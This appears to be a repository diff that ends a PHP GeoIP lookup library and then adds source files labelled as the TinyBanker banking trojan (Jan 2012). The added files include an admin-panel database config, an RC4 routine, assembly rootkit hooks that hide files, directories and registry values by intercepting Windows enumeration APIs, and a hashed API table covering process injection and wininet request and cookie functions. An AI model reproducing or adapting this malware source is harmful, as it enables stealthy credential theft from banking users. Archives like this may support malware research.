"NA", "AF", "AN", "SA", "OC", "EU", "OC", "NA", "AS", "EU",
"NA", "AS", "EU", "AF", "EU", "AS", "AF", "AF", "NA", "AS",
"SA", "SA", "NA", "AS", "AN", "AF", "EU", "NA", "NA", "AS",
"AF", "AF", "AF", "EU", "AF", "OC", "SA", "AF", "AS", "SA",
"NA", "NA", "AF", "AS", "AS", "EU", "EU", "AF", "EU", "NA",
"NA", "AF", "SA", "EU", "AF", "AF", "AF", "EU", "AF", "EU",
"OC", "SA", "OC", "EU", "EU", "EU", "AF", "EU", "NA", "AS",
"SA", "AF", "EU", "NA", "AF", "AF", "NA", "AF", "EU", "AN",
"NA", "OC", "AF", "SA", "AS", "AN", "NA", "EU", "NA", "EU",
"AS", "EU", "AS", "AS", "AS", "AS", "AS", "EU", "EU", "NA",
"AS", "AS", "AF", "AS", "AS", "OC", "AF", "NA", "AS", "AS",
"AS", "NA", "AS", "AS", "AS", "NA", "EU", "AS", "AF", "AF",
"EU", "EU", "EU", "AF", "AF", "EU", "EU", "AF", "OC", "EU",
"AF", "AS", "AS", "AS", "OC", "NA", "AF", "NA", "EU", "AF",
"AS", "AF", "NA", "AS", "AF", "AF", "OC", "AF", "OC", "AF",
"NA", "EU", "EU", "AS", "OC", "OC", "OC", "AS", "NA", "SA",
"OC", "OC", "AS", "AS", "EU", "NA", "OC", "NA", "AS", "EU",
"OC", "SA", "AS", "AF", "EU", "EU", "AF", "AS", "OC", "AF",
"AF", "EU", "AS", "AF", "EU", "EU", "EU", "AF", "EU", "AF",
"AF", "SA", "AF", "NA", "AS", "AF", "NA", "AF", "AN", "AF",
"AS", "AS", "OC", "AS", "AF", "OC", "AS", "EU", "NA", "OC",
"AS", "AF", "EU", "AF", "OC", "NA", "SA", "AS", "EU", "NA",
"SA", "NA", "NA", "AS", "OC", "OC", "OC", "AS", "AF", "EU",
"AF", "AF", "EU", "AF", "--", "--", "--", "EU", "EU", "EU",
"EU", "NA", "NA"
);
}
function geoip_load_shared_mem ($file) {
$fp = fopen($file, "rb");
if (!$fp) {
print "error opening $file: $php_errormsg\n";
exit;
}
$s_array = fstat($fp);
$size = $s_array['size'];
if ($shmid = @shmop_open (GEOIP_SHM_KEY, "w", 0, 0)) {
shmop_delete ($shmid);
shmop_close ($shmid);
}
$shmid = shmop_open (GEOIP_SHM_KEY, "c", 0644, $size);
shmop_write ($shmid, fread($fp, $size), 0);
shmop_close ($shmid);
}
function _setup_segments($gi){
$gi->databaseType = GEOIP_COUNTRY_EDITION;
$gi->record_length = STANDARD_RECORD_LENGTH;
if ($gi->flags & GEOIP_SHARED_MEMORY) {
$offset = @shmop_size ($gi->shmid) - 3;
for ($i = 0; $i < STRUCTURE_INFO_MAX_SIZE; $i++) {
$delim = @shmop_read ($gi->shmid, $offset, 3);
$offset += 3;
if ($delim == (chr(255).chr(255).chr(255))) {
$gi->databaseType = ord(@shmop_read ($gi->shmid, $offset, 1));
$offset++;
if ($gi->databaseType == GEOIP_REGION_EDITION_REV0){
$gi->databaseSegments = GEOIP_STATE_BEGIN_REV0;
} else if ($gi->databaseType == GEOIP_REGION_EDITION_REV1){
$gi->databaseSegments = GEOIP_STATE_BEGIN_REV1;
} else if (($gi->databaseType == GEOIP_CITY_EDITION_REV0)||
($gi->databaseType == GEOIP_CITY_EDITION_REV1)
|| ($gi->databaseType == GEOIP_ORG_EDITION)
|| ($gi->databaseType == GEOIP_ORG_EDITION_V6)
|| ($gi->databaseType == GEOIP_DOMAIN_EDITION)
|| ($gi->databaseType == GEOIP_DOMAIN_EDITION_V6)
|| ($gi->databaseType == GEOIP_ISP_EDITION)
|| ($gi->databaseType == GEOIP_ISP_EDITION_V6)
|| ($gi->databaseType == GEOIP_USERTYPE_EDITION)
|| ($gi->databaseType == GEOIP_USERTYPE_EDITION_V6)
|| ($gi->databaseType == GEOIP_LOCATIONA_EDITION)
|| ($gi->databaseType == GEOIP_ACCURACYRADIUS_EDITION)
|| ($gi->databaseType == GEOIP_CITY_EDITION_REV0_V6)
|| ($gi->databaseType == GEOIP_CITY_EDITION_REV1_V6)
|| ($gi->databaseType == GEOIP_NETSPEED_EDITION_REV1)
|| ($gi->databaseType == GEOIP_NETSPEED_EDITION_REV1_V6)
|| ($gi->databaseType == GEOIP_ASNUM_EDITION)
|| ($gi->databaseType == GEOIP_ASNUM_EDITION_V6)){
$gi->databaseSegments = 0;
$buf = @shmop_read ($gi->shmid, $offset, SEGMENT_RECORD_LENGTH);
for ($j = 0;$j < SEGMENT_RECORD_LENGTH;$j++){
$gi->databaseSegments += (ord($buf[$j]) << ($j * 8));
}
if (($gi->databaseType == GEOIP_ORG_EDITION)
|| ($gi->databaseType == GEOIP_ORG_EDITION_V6)
|| ($gi->databaseType == GEOIP_DOMAIN_EDITION)
|| ($gi->databaseType == GEOIP_DOMAIN_EDITION_V6)
|| ($gi->databaseType == GEOIP_ISP_EDITION)
|| ($gi->databaseType == GEOIP_ISP_EDITION_V6)) {
$gi->record_length = ORG_RECORD_LENGTH;
}
}
break;
} else {
$offset -= 4;
}
}
if (($gi->databaseType == GEOIP_COUNTRY_EDITION)||
($gi->databaseType == GEOIP_COUNTRY_EDITION_V6)||
($gi->databaseType == GEOIP_PROXY_EDITION)||
($gi->databaseType == GEOIP_NETSPEED_EDITION)){
$gi->databaseSegments = GEOIP_COUNTRY_BEGIN;
}
} else {
$filepos = ftell($gi->filehandle);
fseek($gi->filehandle, -3, SEEK_END);
for ($i = 0; $i < STRUCTURE_INFO_MAX_SIZE; $i++) {
$delim = fread($gi->filehandle,3);
if ($delim == (chr(255).chr(255).chr(255))){
$gi->databaseType = ord(fread($gi->filehandle,1));
if ($gi->databaseType == GEOIP_REGION_EDITION_REV0){
$gi->databaseSegments = GEOIP_STATE_BEGIN_REV0;
}
else if ($gi->databaseType == GEOIP_REGION_EDITION_REV1){
$gi->databaseSegments = GEOIP_STATE_BEGIN_REV1;
} else if (($gi->databaseType == GEOIP_CITY_EDITION_REV0)
|| ($gi->databaseType == GEOIP_CITY_EDITION_REV1)
|| ($gi->databaseType == GEOIP_CITY_EDITION_REV0_V6)
|| ($gi->databaseType == GEOIP_CITY_EDITION_REV1_V6)
|| ($gi->databaseType == GEOIP_ORG_EDITION)
|| ($gi->databaseType == GEOIP_DOMAIN_EDITION)
|| ($gi->databaseType == GEOIP_ISP_EDITION)
|| ($gi->databaseType == GEOIP_ORG_EDITION_V6)
|| ($gi->databaseType == GEOIP_DOMAIN_EDITION_V6)
|| ($gi->databaseType == GEOIP_ISP_EDITION_V6)
|| ($gi->databaseType == GEOIP_LOCATIONA_EDITION)
|| ($gi->databaseType == GEOIP_ACCURACYRADIUS_EDITION)
|| ($gi->databaseType == GEOIP_CITY_EDITION_REV0_V6)
|| ($gi->databaseType == GEOIP_CITY_EDITION_REV1_V6)
|| ($gi->databaseType == GEOIP_NETSPEED_EDITION_REV1)
|| ($gi->databaseType == GEOIP_NETSPEED_EDITION_REV1_V6)
|| ($gi->databaseType == GEOIP_USERTYPE_EDITION)
|| ($gi->databaseType == GEOIP_USERTYPE_EDITION_V6)
|| ($gi->databaseType == GEOIP_ASNUM_EDITION)
|| ($gi->databaseType == GEOIP_ASNUM_EDITION_V6)){
$gi->databaseSegments = 0;
$buf = fread($gi->filehandle,SEGMENT_RECORD_LENGTH);
for ($j = 0;$j < SEGMENT_RECORD_LENGTH;$j++){
$gi->databaseSegments += (ord($buf[$j]) << ($j * 8));
}
if ( ( $gi->databaseType == GEOIP_ORG_EDITION )
|| ( $gi->databaseType == GEOIP_DOMAIN_EDITION )
|| ( $gi->databaseType == GEOIP_ISP_EDITION )
|| ( $gi->databaseType == GEOIP_ORG_EDITION_V6 )
|| ( $gi->databaseType == GEOIP_DOMAIN_EDITION_V6 )
|| ( $gi->databaseType == GEOIP_ISP_EDITION_V6 )) {
$gi->record_length = ORG_RECORD_LENGTH;
}
}
break;
} else {
fseek($gi->filehandle, -4, SEEK_CUR);
}
}
if (($gi->databaseType == GEOIP_COUNTRY_EDITION)||
($gi->databaseType == GEOIP_COUNTRY_EDITION_V6)||
($gi->databaseType == GEOIP_PROXY_EDITION)||
($gi->databaseType == GEOIP_NETSPEED_EDITION)){
$gi->databaseSegments = GEOIP_COUNTRY_BEGIN;
}
fseek($gi->filehandle,$filepos,SEEK_SET);
}
return $gi;
}
function geoip_open($filename, $flags) {
$gi = new GeoIP;
$gi->flags = $flags;
if ($gi->flags & GEOIP_SHARED_MEMORY) {
$gi->shmid = @shmop_open (GEOIP_SHM_KEY, "a", 0, 0);
} else {
$gi->filehandle = fopen($filename,"rb") or die( "Can not open $filename\n" );
if ($gi->flags & GEOIP_MEMORY_CACHE) {
$s_array = fstat($gi->filehandle);
$gi->memory_buffer = fread($gi->filehandle, $s_array['size']);
}
}
$gi = _setup_segments($gi);
return $gi;
}
function geoip_close($gi) {
if ($gi->flags & GEOIP_SHARED_MEMORY) {
return true;
}
return fclose($gi->filehandle);
}
function geoip_country_id_by_name_v6($gi, $name) {
$rec = dns_get_record($name, DNS_AAAA);
if ( !$rec ) {
return false;
}
$addr = $rec[0]["ipv6"];
if (!$addr || $addr == $name) {
return false;
}
return geoip_country_id_by_addr_v6($gi, $addr);
}
function geoip_country_id_by_name($gi, $name) {
$addr = gethostbyname($name);
if (!$addr || $addr == $name) {
return false;
}
return geoip_country_id_by_addr($gi, $addr);
}
function geoip_country_code_by_name_v6($gi, $name) {
$country_id = geoip_country_id_by_name_v6($gi,$name);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_CODES[$country_id];
}
return false;
}
function geoip_country_code_by_name($gi, $name) {
$country_id = geoip_country_id_by_name($gi,$name);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_CODES[$country_id];
}
return false;
}
function geoip_country_name_by_name_v6($gi, $name) {
$country_id = geoip_country_id_by_name_v6($gi,$name);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_NAMES[$country_id];
}
return false;
}
function geoip_country_name_by_name($gi, $name) {
$country_id = geoip_country_id_by_name($gi,$name);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_NAMES[$country_id];
}
return false;
}
function geoip_country_id_by_addr_v6($gi, $addr) {
$ipnum = inet_pton($addr);
return _geoip_seek_country_v6($gi, $ipnum) - GEOIP_COUNTRY_BEGIN;
}
function geoip_country_id_by_addr($gi, $addr) {
$ipnum = ip2long($addr);
return _geoip_seek_country($gi, $ipnum) - GEOIP_COUNTRY_BEGIN;
}
function geoip_country_code_by_addr_v6($gi, $addr) {
$country_id = geoip_country_id_by_addr_v6($gi,$addr);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_CODES[$country_id];
}
return false;
}
function geoip_country_code_by_addr($gi, $addr) {
if ($gi->databaseType == GEOIP_CITY_EDITION_REV1) {
$record = geoip_record_by_addr($gi,$addr);
if ( $record !== false ) {
return $record->country_code;
}
} else {
$country_id = geoip_country_id_by_addr($gi,$addr);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_CODES[$country_id];
}
}
return false;
}
function geoip_country_name_by_addr_v6($gi, $addr) {
$country_id = geoip_country_id_by_addr_v6($gi,$addr);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_NAMES[$country_id];
}
return false;
}
function geoip_country_name_by_addr($gi, $addr) {
if ($gi->databaseType == GEOIP_CITY_EDITION_REV1) {
$record = geoip_record_by_addr($gi,$addr);
return $record->country_name;
} else {
$country_id = geoip_country_id_by_addr($gi,$addr);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_NAMES[$country_id];
}
}
return false;
}
function _geoip_seek_country_v6($gi, $ipnum) {
# arrays from unpack start with offset 1
# yet another php mystery. array_merge work around
# this broken behaviour
$v6vec = array_merge(unpack( "C16", $ipnum));
$offset = 0;
for ($depth = 127; $depth >= 0; --$depth) {
if ($gi->flags & GEOIP_MEMORY_CACHE) {
// workaround php's broken substr, strpos, etc handling with
// mbstring.func_overload and mbstring.internal_encoding
$enc = mb_internal_encoding();
mb_internal_encoding('ISO-8859-1');
$buf = substr($gi->memory_buffer,
2 * $gi->record_length * $offset,
2 * $gi->record_length);
mb_internal_encoding($enc);
} elseif ($gi->flags & GEOIP_SHARED_MEMORY) {
$buf = @shmop_read ($gi->shmid,
2 * $gi->record_length * $offset,
2 * $gi->record_length );
} else {
fseek($gi->filehandle, 2 * $gi->record_length * $offset, SEEK_SET) == 0
or die("fseek failed");
$buf = fread($gi->filehandle, 2 * $gi->record_length);
}
$x = array(0,0);
for ($i = 0; $i < 2; ++$i) {
for ($j = 0; $j < $gi->record_length; ++$j) {
$x[$i] += ord($buf[$gi->record_length * $i + $j]) << ($j * 8);
}
}
$bnum = 127 - $depth;
$idx = $bnum >> 3;
$b_mask = 1 << ( $bnum & 7 ^ 7 );
if (($v6vec[$idx] & $b_mask) > 0) {
if ($x[1] >= $gi->databaseSegments) {
return $x[1];
}
$offset = $x[1];
} else {
if ($x[0] >= $gi->databaseSegments) {
return $x[0];
}
$offset = $x[0];
}
}
trigger_error("error traversing database - perhaps it is corrupt?", E_USER_ERROR);
return false;
}
function _geoip_seek_country($gi, $ipnum) {
$offset = 0;
for ($depth = 31; $depth >= 0; --$depth) {
if ($gi->flags & GEOIP_MEMORY_CACHE) {
// workaround php's broken substr, strpos, etc handling with
// mbstring.func_overload and mbstring.internal_encoding
$enc = mb_internal_encoding();
mb_internal_encoding('ISO-8859-1');
$buf = substr($gi->memory_buffer,
2 * $gi->record_length * $offset,
2 * $gi->record_length);
mb_internal_encoding($enc);
} elseif ($gi->flags & GEOIP_SHARED_MEMORY) {
$buf = @shmop_read ($gi->shmid,
2 * $gi->record_length * $offset,
2 * $gi->record_length );
} else {
fseek($gi->filehandle, 2 * $gi->record_length * $offset, SEEK_SET) == 0
or die("fseek failed");
$buf = fread($gi->filehandle, 2 * $gi->record_length);
}
$x = array(0,0);
for ($i = 0; $i < 2; ++$i) {
for ($j = 0; $j < $gi->record_length; ++$j) {
$x[$i] += ord($buf[$gi->record_length * $i + $j]) << ($j * 8);
}
}
if ($ipnum & (1 << $depth)) {
if ($x[1] >= $gi->databaseSegments) {
return $x[1];
}
$offset = $x[1];
} else {
if ($x[0] >= $gi->databaseSegments) {
return $x[0];
}
$offset = $x[0];
}
}
trigger_error("error traversing database - perhaps it is corrupt?", E_USER_ERROR);
return false;
}
function _common_get_org($gi, $seek_org){
$record_pointer = $seek_org + (2 * $gi->record_length - 1) * $gi->databaseSegments;
if ($gi->flags & GEOIP_SHARED_MEMORY) {
$org_buf = @shmop_read ($gi->shmid, $record_pointer, MAX_ORG_RECORD_LENGTH);
} else {
fseek($gi->filehandle, $record_pointer, SEEK_SET);
$org_buf = fread($gi->filehandle,MAX_ORG_RECORD_LENGTH);
}
// workaround php's broken substr, strpos, etc handling with
// mbstring.func_overload and mbstring.internal_encoding
$enc = mb_internal_encoding();
mb_internal_encoding('ISO-8859-1');
$org_buf = substr($org_buf, 0, strpos($org_buf, "\0"));
mb_internal_encoding($enc);
return $org_buf;
}
function _get_org_v6($gi,$ipnum){
$seek_org = _geoip_seek_country_v6($gi,$ipnum);
if ($seek_org == $gi->databaseSegments) {
return NULL;
}
return _common_get_org($gi, $seek_org);
}
function _get_org($gi,$ipnum){
$seek_org = _geoip_seek_country($gi,$ipnum);
if ($seek_org == $gi->databaseSegments) {
return NULL;
}
return _common_get_org($gi, $seek_org);
}
function geoip_name_by_addr_v6 ($gi,$addr) {
if ($addr == NULL) {
return 0;
}
$ipnum = inet_pton($addr);
return _get_org_v6($gi, $ipnum);
}
function geoip_name_by_addr ($gi,$addr) {
if ($addr == NULL) {
return 0;
}
$ipnum = ip2long($addr);
return _get_org($gi, $ipnum);
}
function geoip_org_by_addr ($gi,$addr) {
return geoip_name_by_addr($gi, $addr);
}
function _get_region($gi,$ipnum){
if ($gi->databaseType == GEOIP_REGION_EDITION_REV0){
$seek_region = _geoip_seek_country($gi,$ipnum) - GEOIP_STATE_BEGIN_REV0;
if ($seek_region >= 1000){
$country_code = "US";
$region = chr(($seek_region - 1000)/26 + 65) . chr(($seek_region - 1000)%26 + 65);
} else {
$country_code = $gi->GEOIP_COUNTRY_CODES[$seek_region];
$region = "";
}
return array ($country_code,$region);
} else if ($gi->databaseType == GEOIP_REGION_EDITION_REV1) {
$seek_region = _geoip_seek_country($gi,$ipnum) - GEOIP_STATE_BEGIN_REV1;
//print $seek_region;
if ($seek_region < US_OFFSET){
$country_code = "";
$region = "";
} else if ($seek_region < CANADA_OFFSET) {
$country_code = "US";
$region = chr(($seek_region - US_OFFSET)/26 + 65) . chr(($seek_region - US_OFFSET)%26 + 65);
} else if ($seek_region < WORLD_OFFSET) {
$country_code = "CA";
$region = chr(($seek_region - CANADA_OFFSET)/26 + 65) . chr(($seek_region - CANADA_OFFSET)%26 + 65);
} else {
$country_code = $gi->GEOIP_COUNTRY_CODES[($seek_region - WORLD_OFFSET) / FIPS_RANGE];
$region = "";
}
return array ($country_code,$region);
}
}
function geoip_region_by_addr ($gi,$addr) {
if ($addr == NULL) {
return 0;
}
$ipnum = ip2long($addr);
return _get_region($gi, $ipnum);
}
function getdnsattributes ($l,$ip){
$r = new Net_DNS_Resolver();
$r->nameservers = array("ws1.maxmind.com");
$p = $r->search($l."." . $ip .".s.maxmind.com","TXT","IN");
$str = is_object($p->answer[0])?$p->answer[0]->string():'';
$str = substr( $str, 1, -1 );
return $str;
}
?>

11
malwares/Source/Original/TinyBanker_Jan2012/admin/includes/mysql.php Normal file
View File

@@ -0,0 +1,11 @@
<?php
$mysqlhost = "localhost";
$mysqlname = "hunt";
$mysqlpass = "pass";
$mysqlbase = "hunt";
mysql_connect($mysqlhost, $mysqlname, $mysqlpass) or die("Could not connect to database: " . mysql_error());
mysql_select_db($mysqlbase) or die("Could not select database : " . mysql_error());
?>

35
malwares/Source/Original/TinyBanker_Jan2012/admin/includes/rc4.php Normal file
View File

@@ -0,0 +1,35 @@
<?php
function encrypt ($pwd, $data, $ispwdHex = 0) {
if ($ispwdHex) $pwd = @pack('H*', $pwd); // valid input, please!
$key[] = '';
$box[] = '';
$cipher = '';
$pwd_length = strlen($pwd);
$data_length = strlen($data);
for ($i = 0; $i < 256; $i++) {
$key[$i] = ord($pwd[$i % $pwd_length]);
$box[$i] = $i;
}
for ($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $key[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for ($a = $j = $i = 0; $i < $data_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$k = $box[(($box[$a] + $box[$j]) % 256)];
$cipher .= chr(ord($data[$i]) ^ $k);
}
return $cipher;
}
?>

109
malwares/Source/Original/TinyBanker_Jan2012/source/-RootKit/HideFile.asm Normal file
View File

@@ -0,0 +1,109 @@
.code
;; -------------------------------------------------------------------------------- ;;
NewFindFirstFileEx proc p1:dword, p2:dword, p3:dword, p4:dword, p5:dword, p6:dword
push p6 ; dwAdditionalFlags
push p5 ; lpSearchFilter
push p4 ; fSearchOp
push p3 ; lpFindFileData
push p2 ; fInfoLevelId
push p1 ; lpFileName
call eax ; Real FindFirstFileEx
.if eax==INVALID_HANDLE_VALUE
ret
.endif
pushad
; Decision: to hide or not to hide
mov ebx, p3
add ebx, 44 ; FileName offset in WIN32_FIND_DATA struc
call IsHiddenFile
.if ebx==0
popad
ret
.endif
; Hide file (replace by next)
invoke FindNextFileW, eax, p3
.if eax!=0
popad
ret
.endif
; If hidden file was last
invoke SetLastError, ERROR_FILE_NOT_FOUND
popad
xor eax, eax
ret
NewFindFirstFileEx endp
;; -------------------------------------------------------------------------------- ;;
NewFindFirstFile proc p1:dword, p2:dword
push p2 ; lpFindFileData
push p1 ; lpFileName
call eax ; Real FindFirstFile
.if eax==INVALID_HANDLE_VALUE
ret
.endif
pushad
; Decision: to hide or not to hide
mov ebx, p2
add ebx, 44 ; FileName offset in WIN32_FIND_DATA struc
call IsHiddenFile
.if ebx==0
popad
ret
.endif
; Hide file (replace by next)
invoke FindNextFileW, eax, p2
.if eax!=0
popad
ret
.endif
; If hidden file was last
invoke SetLastError, ERROR_FILE_NOT_FOUND
popad
xor eax, eax
ret
NewFindFirstFile endp
;; -------------------------------------------------------------------------------- ;;
NewFindNextFile proc p1:dword, p2:dword
local RealFindNextFile : dword
mov RealFindNextFile, eax
@FindNextFile:
push p2 ; lpFindFileData
push p1 ; hFindFile
call RealFindNextFile ; Real FindNextFile
.if eax==0
ret
.endif
pushad
; Decision: to hide or not to hide
mov ebx, p2
add ebx, 44 ; FileName offset in WIN32_FIND_DATA struc
call IsHiddenFile
.if ebx==0
popad
ret
.endif
; Hide file (replace by next)
popad
jmp @FindNextFile
NewFindNextFile endp

0
malwares/Source/Original/TinyBanker_Jan2012/source/-RootKit/HideProc.asm Normal file
View File

53
malwares/Source/Original/TinyBanker_Jan2012/source/-RootKit/HideReg.asm Normal file
View File

@@ -0,0 +1,53 @@
.data
nHdnCount dd 0 ; Hidden records counter (for delta)
.code
;; -------------------------------------------------------------------------------- ;;
NewRegEnumValue proc p1:dword, p2:dword, p3:dword, p4:dword, p5:dword, p6:dword, p7:dword, p8:dword
local RealRegEnumValue : dword
mov RealRegEnumValue, eax
; Init counter if search from begining
.if p2==0
mov nHdnCount, 0
; else add delta to dwIndex
.else
mov eax, nHdnCount
add p2, eax
.endif
@RealRegEnumValue:
push p8 ; lpcbData
push p7 ; lpData
push p6 ; lpType
push p5 ; lpReserved
push p4 ; lpcchValueName
push p3 ; lpValueName
push p2 ; dwIndex
push p1 ; hKey
call RealRegEnumValue ; Real RegEnumValue
.if eax!=ERROR_SUCCESS
ret
.endif
pushad
; Decision: to hide or not to hide
mov ebx, p3
call IsHiddenRegValue
.if ebx==0
popad
ret
.endif
; Hide Value (replace by next)
inc p2 ; Next dwIndex
inc nHdnCount ; Increase counter (for delta)
popad
jmp @RealRegEnumValue
NewRegEnumValue endp

34
malwares/Source/Original/TinyBanker_Jan2012/source/-RootKit/IsHidden.asm Normal file
View File

@@ -0,0 +1,34 @@
.code
;; -------------------------------------------------------------------------------- ;;
IsHiddenFile proc
cmp byte ptr [ebx], "A"
je @hide
cmp byte ptr [ebx], "~"
je @hide
;; Not hide
xor ebx, ebx
ret
@hide:
ret
IsHiddenFile endp
;; -------------------------------------------------------------------------------- ;;
IsHiddenRegValue proc
cmp byte ptr [ebx], "C"
je @hide
;; Not hide
xor ebx, ebx
ret
@hide:
ret
IsHiddenRegValue endp

117
malwares/Source/Original/TinyBanker_Jan2012/source/-RootKit/ZwHdFile.asm Normal file
View File

@@ -0,0 +1,117 @@
FILE_BOTH_DIRECTORY_INFORMATION struc
NextEntryOffset dd ?
Unknown dd ?
CreationTime dq ?
LastAccessTime dq ?
LastWriteTime dq ?
ChangeTime dq ?
EndOfFile dq ?
AllocationSize dq ?
FileAttributes dd ?
FileNameLength dd ?
EaInformationLength dd ?
AlternateNameLength db ?
_DummyAlign db ?
AlternateName dw 12 dup (?)
FileName dw ?
FILE_BOTH_DIRECTORY_INFORMATION ends
.code
;; -------------------------------------------------------------------------------- ;;
NewZwQueryDirectoryFile proc p1:dword, p2:dword, p3:dword, p4:dword, p5:dword, p6:dword, p7:dword, p8:dword, p9:dword, p10:dword, p11:dword
local RealZwQueryDirectoryFile : dword
mov RealZwQueryDirectoryFile, eax
@NextQuery:
push p11 ; RestartScan
push p10 ; FileName
push p9 ; ReturnSingleEntry
push p8 ; FileInformationClass
push p7 ; FileInformationLength
push p6 ; FileInformation
push p5 ; IoStatusBlock
push p4 ; ApcContext
push p3 ; ApcRoutine
push p2 ; Event
push p1 ; FileHandle
call RealZwQueryDirectoryFile ; Real ZwQueryDirectoryFile
.if eax!=STATUS_SUCCESS
ret
.endif
; Only FileBothDirectoryInformation
.if p8!=3
ret
.endif
; Only not empty struc
.if p6==0
ret
.endif
pushad
assume eax : ptr FILE_BOTH_DIRECTORY_INFORMATION, edx : ptr FILE_BOTH_DIRECTORY_INFORMATION
mov eax, p6
@NextFname:
; Decision: to hide or not to hide
lea ebx, [eax].FileName
call IsHiddenFile
.if ebx!=0
.if eax==p6 ; First record
.if p9==TRUE
popad
jmp @NextQuery
.elseif [eax].NextEntryOffset==0 ; Only 1 record
popad
mov eax, STATUS_NO_MORE_FILES
ret
.endif
mov ebx, [eax].NextEntryOffset ; 1st record len
mov edx, eax ; 2nd -
add edx, ebx ; record addr
mov ecx, [edx].NextEntryOffset ; 2nd record len
.if ecx==0
mov ecx, sizeof FILE_BOTH_DIRECTORY_INFORMATION
add ecx, [edx].FileNameLength
.else
add [edx].NextEntryOffset, ebx ; offset = len2 + len1
.endif
mov esi, edx ; Source
mov edi, eax ; Destination
rep movsb
mov edx, eax
.elseif [eax].NextEntryOffset==0 ; Last record
mov [edx].NextEntryOffset, 0
.else ; Other records
mov ecx, [eax].NextEntryOffset
add ecx, [edx].NextEntryOffset
mov [edx].NextEntryOffset, ecx
.endif
.else
mov edx, eax
.endif
; Exit if no more records
cmp [eax].NextEntryOffset, 0
je @End
; Check Next record
add eax, [eax].NextEntryOffset
jmp @NextFname
@End:
assume eax : nothing, edx : nothing
popad
ret
NewZwQueryDirectoryFile endp

2
malwares/Source/Original/TinyBanker_Jan2012/source/-RootKit/ZwHdProc.asm Normal file
View File

@@ -0,0 +1,2 @@
; ZwQuerySystemInformation

78
malwares/Source/Original/TinyBanker_Jan2012/source/-RootKit/ZwHdReg.asm Normal file
View File

@@ -0,0 +1,78 @@
KEY_VALUE_BASIC_INFORMATION struc
TitleIndex dd ?
_Type dd ?
NameLength dd ?
_Name dw ?
KEY_VALUE_BASIC_INFORMATION ends
KEY_VALUE_FULL_INFORMATION struc
TitleIndex dd ?
_Type dd ?
DataOffset dd ?
DataLength dd ?
NameLength dd ?
_Name dw ?
KEY_VALUE_FULL_INFORMATION ends
.code
;; -------------------------------------------------------------------------------- ;;
NewZwEnumerateValueKey proc p1:dword, p2:dword, p3:dword, p4:dword, p5:dword, p6:dword
local RealZwEnumerateKey : dword
local nCount : dword
local lpName : dword
mov RealZwEnumerateKey, eax
mov nCount, 0
mov eax, p4
.if p3==0
lea eax, (KEY_VALUE_BASIC_INFORMATION ptr [eax])._Name
.elseif p3==1
lea eax, (KEY_VALUE_FULL_INFORMATION ptr [eax])._Name
.else
xor eax, eax
push p2
pop nCount
.endif
mov lpName, eax
@RealZwEnumerateKey:
push p6 ; ResultLength
push p5 ; Length
push p4 ; KeyValueInformation
push p3 ; KeyValueInformationClass
push nCount ; Index
push p1 ; KeyHandle
call RealZwEnumerateKey ; Real ZwEnumerateValueKey
.if eax!=STATUS_SUCCESS
ret
.endif
.if lpName==0
ret
.endif
pushad
; Decision: to hide or not to hide
mov ebx, lpName
call IsHiddenRegValue
.if ebx!=0
inc p2
.endif
mov eax, p2
.if nCount==eax
popad
ret
.endif
inc nCount
popad
jmp @RealZwEnumerateKey
NewZwEnumerateValueKey endp

103
malwares/Source/Original/TinyBanker_Jan2012/source/API/APITable.inc Normal file
View File

@@ -0,0 +1,103 @@
.code
;; Constants
ARRAYLEN equ 1024
KBYTE equ 1024
MBYTE equ 1024*KBYTE
BUFFERLEN equ 2*MBYTE
RESERVE equ 128*KBYTE
HTTP_REQUEST equ 1
HTTPS_REQUEST equ 2
INJECT_GRABBED equ 3
@_API_Hashes_table:
;; API Hashes table start
;; kernel32
_LoadLibraryA dd 0, 05A575AE4h
_GetModuleHandleA dd 0, 0C02BD427h
_CreateToolhelp32Snapshot dd 0, 03B2EFF48h
_Process32First dd 0, 0D2F49D5Ah
_Process32Next dd 0, 0B06C2089h
_OpenProcess dd 0, 0684C0A05h
_CreateFileA dd 0, 0A2A93BE9h
_GetFileSize dd 0, 0CA80AE13h
_SetFilePointer dd 0, 006D09387h
_ReadFile dd 0, 004D8BEBAh
_WriteFile dd 0, 0245BD03Bh
_CreateRemoteThread dd 0, 03E01E6ACh
_CreateThread dd 0, 072A43A6Eh
_ExitProcess dd 0, 0D4D6F7A1h
_VirtualAlloc dd 0, 0C03EE45Ah
_VirtualAllocEx dd 0, 0CC09B795h
_VirtualProtect dd 0, 0CC265304h
_VirtualProtectEx dd 0, 01355E61Fh
_VirtualFree dd 0, 0D252282Fh
_VirtualFreeEx dd 0, 041B9B35Ah
_WriteProcessMemory dd 0, 0894852D9h
_lstrcmpiA dd 0, 02BB2FD91h
_lstrlenA dd 0, 0063E2E81h
_CloseHandle dd 0, 0986B3A78h
_GetCurrentProcessId dd 0, 01547C797h
_WinExec dd 0, 000BB9A05h
_Sleep dd 0, 00003B1AFh
_ExitThread dd 0, 0D543F4F0h
;; ntdll
_RtlAdjustPrivilege dd 0, 0EFD3AA98h
_RtlGetLastWin32Error dd 0, 0FEC76D6Fh
_RtlSetLastWin32Error dd 0, 0BB094F7Bh
;; ws2_32
_WSAStartup dd 0, 0F1AED070h
_inet_addr dd 0, 02A51A274h
_gethostbyname dd 0, 03718CB58h
_socket dd 0, 000222B6Bh
_connect dd 0, 000D2E20Ah
_send dd 0, 00000B0D0h
_recv dd 0, 00000AF3Eh
_closesocket dd 0, 0B33E156Bh
;; wininet
_HttpAddRequestHeadersA dd 0, 003F21E69h
_HttpAddRequestHeadersW dd 0, 003F21E7Fh
_HttpQueryInfoA dd 0, 0C542F043h
_InternetQueryOptionA dd 0, 0312DDA65h
_InternetGetCookieA dd 0, 04C581F48h
_InternetSetStatusCallback dd 0, 0C3F003F0h
_InternetReadFileExA dd 0, 0CA699E5Bh
_HttpSendRequestA dd 0, 0AF43415Ah
_HttpSendRequestW dd 0, 0AF434170h
